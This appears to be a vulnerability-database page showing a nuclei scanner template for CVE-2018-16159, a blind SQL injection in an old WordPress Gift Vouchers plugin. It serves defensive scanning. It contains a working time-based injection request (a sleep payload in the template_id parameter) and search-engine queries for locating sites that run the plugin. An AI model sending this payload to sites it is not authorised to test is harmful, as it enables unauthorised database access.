Lucene search
K

WordPress Gift Voucher <4.1.8 - Blind SQL Injection

🗓️ 19 Jun 2026 11:10:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

WordPress Gift Voucher <4.1.8 - Blind SQL Injection vulnerability in a wp-admin request allowing unauthorized database acces

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2018-16159
29 Dec 202400:00
circl
CNVD
WordPress Gift Vouchers SQL Injection Vulnerability
3 Sep 201800:00
cnvd
CVE
CVE-2018-16159
30 Aug 201815:00
cve
Cvelist
CVE-2018-16159
30 Aug 201815:00
cvelist
NVD
CVE-2018-16159
30 Aug 201815:29
nvd
OSV
CVE-2018-16159
30 Aug 201815:29
osv
Patchstack
WordPress Gift Voucher plugin <=1.0.5 - Authenticated Blind SQL Injection (SQLi) vulnerability
1 Sep 201800:00
patchstack
Prion
Sql injection
30 Aug 201815:29
prion
VulnCheck KEV
VulnCheck KEV: CVE-2018-16159
26 Nov 202300:00
vulncheck_kev
wpexploit
Gift Voucher <= 4.1.1 - Unauthenticated Blind SQL Injection
26 Aug 201800:00
wpexploit
Rows per page
id: CVE-2018-16159

info:
  name: WordPress Gift Voucher <4.1.8 - Blind SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Gift Vouchers plugin before 4.1.8 contains a blind SQL injection vulnerability via the template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
  remediation: Fixed in version 4.1.8.
  reference:
    - https://wpscan.com/vulnerability/9117
    - https://wordpress.org/plugins/gift-voucher/
    - https://www.exploit-db.com/exploits/45255/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16159
    - https://wpvulndb.com/vulnerabilities/9117
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-16159
    cwe-id: CWE-89
    epss-score: 0.50852
    epss-percentile: 0.98784
    cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: codemenschen
    product: gift_vouchers
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/gift-voucher/"
    fofa-query: body="/wp-content/plugins/gift-voucher/"
  tags: time-based-sqli,cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen,vkev,vuln

http:
  - raw:
      - |
        @timeout: 10s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=wpgv_doajax_front_template&template_id=1 and sleep(6)#

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "images") && contains(body, "title")'
        condition: and
# digest: 4b0a004830460221009369e33b7766959689f2449b7ef626d008c4996a4c77ed06c8209eded4d21282022100d35d9ef05a325303850b2f19508e8ebaf8b8d08fad481cdc3d5d544a0b8ff0bc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 39.8
EPSS0.50852
26